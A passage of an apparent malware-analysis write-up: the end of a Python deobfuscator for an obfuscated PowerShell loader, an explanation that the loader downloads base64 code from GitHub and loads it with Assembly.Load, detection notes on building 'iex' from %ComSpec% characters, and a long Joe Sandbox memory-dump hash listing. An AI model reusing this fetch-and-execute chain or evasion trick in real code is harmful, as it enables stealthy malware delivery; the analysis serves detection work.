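        pos = close

    # 3. &( $env:ComSpec[4,24,25] -join '' ): the cmdlet name is spelled from ComSpec characters
    m = re.search(r"\$env:comspec\[([\d,]+)\]", cmd, re.I)
    invoked = "".join(comspec[int(i)] for i in m.group(1).split(",")) if m else None

    # 4. IOCs: plain URLs, plus "..." literals that are a URL written backwards
    urls = _URL.findall(script)
    for lit in re.findall(r'"([^"]*)"', script):
        if re.match(r"https?://", lit[::-1]):
            urls.append(lit[::-1])
    calls = re.findall(r"\[([\w.]+)\]::(\w+)\(", script)

    return {"script": script, "invoked_via": invoked, "urls": urls, "static_calls": calls}


if __name__ == "__main__":
    result = deobfuscate(OBFUSCATED)
    print(result["script"])
    print("piped into:", result["invoked_via"])
    for u in result["urls"]:
        print("url:", u)
```

The decoded script downloads a base64 text file from the raw.githubusercontent.com URL, decodes it, loads it with [Reflection.Assembly]::Load and calls [dnlib.IO.Home]::VAI with a first argument that is a URL written backwards; the script reverses any quoted literal that reads as a URL backwards so it shows up beside the GitHub URL. Nothing in the report says what VAI does with its arguments, so the decoded strings should be treated as IOCs, not as a description of the payload. The detection caveat is that the cmdlet name never appears in the command line: "iex" is assembled from characters 4, 24 and 25 of %ComSpec% at runtime, so a rule that matches the literal iex or Invoke-Expression misses this loader, while $env:ComSpec[ indexing, [chAR] casts joined into a string, and FromBase64String followed by Assembly.Load in the same command are the features that survive re-obfuscation.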

                          Memory Dump Source
                          • Source File: 00000002.00000002.2444221385.00007FFE16650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16650000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ffe16650000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e299623f713b4dffa0203e319fe819a063794d4d4339be70ff8e16bca9f68e6
                          • Instruction ID: 38fbe71a769cb222858aa8feaedf676e0ce473a8dca513baa405d61122bc47f8
                          • Opcode Fuzzy Hash: 6e299623f713b4dffa0203e319fe819a063794d4d4339be70ff8e16bca9f68e6
                          • Instruction Fuzzy Hash: 8501677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E892CB46
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: \_H$r6?t
                          • API String ID: 0-4185842631
                          • Opcode ID: 42963d11d734c3fbbf4706868c30bf17da628e0c1c317f869316432a2ef00898
                          • Instruction ID: 4e88c71fe305867ae82cece6ba763f2c9bdf5f5f45f39247cb38ba384c611f6e
                          • Opcode Fuzzy Hash: 42963d11d734c3fbbf4706868c30bf17da628e0c1c317f869316432a2ef00898
                          • Instruction Fuzzy Hash: CD012B32B0ED194FF7B1816D14662B572E1FF98130F1802B7D84FD31A5ED1DA8158280
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b75ab61965a96de43c9400203257bd81ac054cc2d28d4f9ce0e246eb3a50a81f
                          • Instruction ID: 1a92f553d675ad29bfdf92d1521836d885c5f03c5861f520d96027b9e85e0baf
                          • Opcode Fuzzy Hash: b75ab61965a96de43c9400203257bd81ac054cc2d28d4f9ce0e246eb3a50a81f
                          • Instruction Fuzzy Hash: 0D21D232B1DB994FEB55AB19A8123F977E0EF45334F0441FBE489835A2DB25B809C6C1
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c21ebc95c0a814c3b100eea1edd04152cfee4310219d6356c0e1cf3081ce9da1
                          • Instruction ID: beb2c5957f18bda28cea324d00a5e9bf3ebb9e5088857146c5c10c0f48448b33
                          • Opcode Fuzzy Hash: c21ebc95c0a814c3b100eea1edd04152cfee4310219d6356c0e1cf3081ce9da1
                          • Instruction Fuzzy Hash: BC019222A1ED8A4BE7B6921D18242B596E2EF95235B6900FFC01CC71A2DD1DAC094340
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f6f424dc7b72b4240efa0d2e23777565131aa3ba6278a34fd9866051d06626f4
                          • Instruction ID: f61541d498290e5aec5b5e962790513c990d4993f6c1ff8661e25a134fdae0fa
                          • Opcode Fuzzy Hash: f6f424dc7b72b4240efa0d2e23777565131aa3ba6278a34fd9866051d06626f4
                          • Instruction Fuzzy Hash: 1D118C2050D7C14FD30B9B3848657A47FE2AF4B214F0946EED089DF1F3DA599855C762
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424417173.00007FFE16640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16640000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1aa461c8b0cfdae193b1ec41de5010ef01dc4512bf3ff2cf0cf13bff39321e54
                          • Instruction ID: 361945cd808a3be4f8444b1cb8fc37df31cc12bfcc06ab6776deacc41fc3ed2a
                          • Opcode Fuzzy Hash: 1aa461c8b0cfdae193b1ec41de5010ef01dc4512bf3ff2cf0cf13bff39321e54
                          • Instruction Fuzzy Hash: 3201677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661D636E892CB46
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 27360a1ba743a10862cf6777c8d5651b43269c194e19e26de5c2bbc60d66c590
                          • Instruction ID: a653f32eb90a412df0e810a3376e2a99ba9480bd9f01fa4ae4a16e5e0c2d6154
                          • Opcode Fuzzy Hash: 27360a1ba743a10862cf6777c8d5651b43269c194e19e26de5c2bbc60d66c590
                          • Instruction Fuzzy Hash: B9018F32A1CB488FDB549B09A8024A87BE0FB49720B0501EBE44993162CA25BC45CBC6
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424417173.00007FFE16640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16640000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94ebf330d3db4b06f59ce51f812181b8c53c1607ce02bd6ef58ad98f49fc243d
                          • Instruction ID: 057ade9c31d5dde659d8487d0f12398b763ddcdca4e5b13b6c5eec19dadcfe06
                          • Opcode Fuzzy Hash: 94ebf330d3db4b06f59ce51f812181b8c53c1607ce02bd6ef58ad98f49fc243d
                          • Instruction Fuzzy Hash: 59E0ED20B29D095FDA88B73850693BC66D2EF98311F8000BCE90EC33E3ED285C064745
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b802c85c77a9f64827024068d5665a3f9e33f0f8eb0c18a8e6533f81451174d1
                          • Instruction ID: f8e1bf606e2cf7c7630b294dac880c02f79c989f4df8cc967a27b69d1893a95c
                          • Opcode Fuzzy Hash: b802c85c77a9f64827024068d5665a3f9e33f0f8eb0c18a8e6533f81451174d1
                          • Instruction Fuzzy Hash: AFE09A22A0EBC80FE7A6DB2808281647BE1AB1222435840FFD099CB1A3D81C8C0A8701
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7beb153b7342c6c616b9045db1a3de6e43c9f68df30e13ce174f9919acbf4813
                          • Instruction ID: 3113533fae0695010ee6c5d5c6d85398cf463df543c6ef5c32b6fa227ca3aef2
                          • Opcode Fuzzy Hash: 7beb153b7342c6c616b9045db1a3de6e43c9f68df30e13ce174f9919acbf4813
                          • Instruction Fuzzy Hash: BDD01232A185188EDF44EB98A4416ECF7A1EB4C366F54007BD10DD2152D92954518790
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 898346499cc0d20690667877f30720d24cb20adbdefc32083d7a73f7888902a4
                          • Instruction ID: 58c0294f74d4a5b222c41f0eeaac48fa93365ee2ad0f4087ade866a9745fa6b0
                          • Opcode Fuzzy Hash: 898346499cc0d20690667877f30720d24cb20adbdefc32083d7a73f7888902a4
                          • Instruction Fuzzy Hash: 67D01730A15E0E8BA7E6A72C001927190D3EFC8A1276040B9801DC62A6ED38D8464300
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424860810.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffe16710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a08f975b4e8fd76241015e4273f628f3c5ca8f10b2c42de20256bebbb978208
                          • Instruction ID: 6696ca3105f2f652b8bf211151539ced8fc981bcf9f21a8029493d9ac506a85f
                          • Opcode Fuzzy Hash: 7a08f975b4e8fd76241015e4273f628f3c5ca8f10b2c42de20256bebbb978208
                          • Instruction Fuzzy Hash: 2EC08011F15D17079556613C003D5F801C1BF945117554575440DD72E6DC18DC014340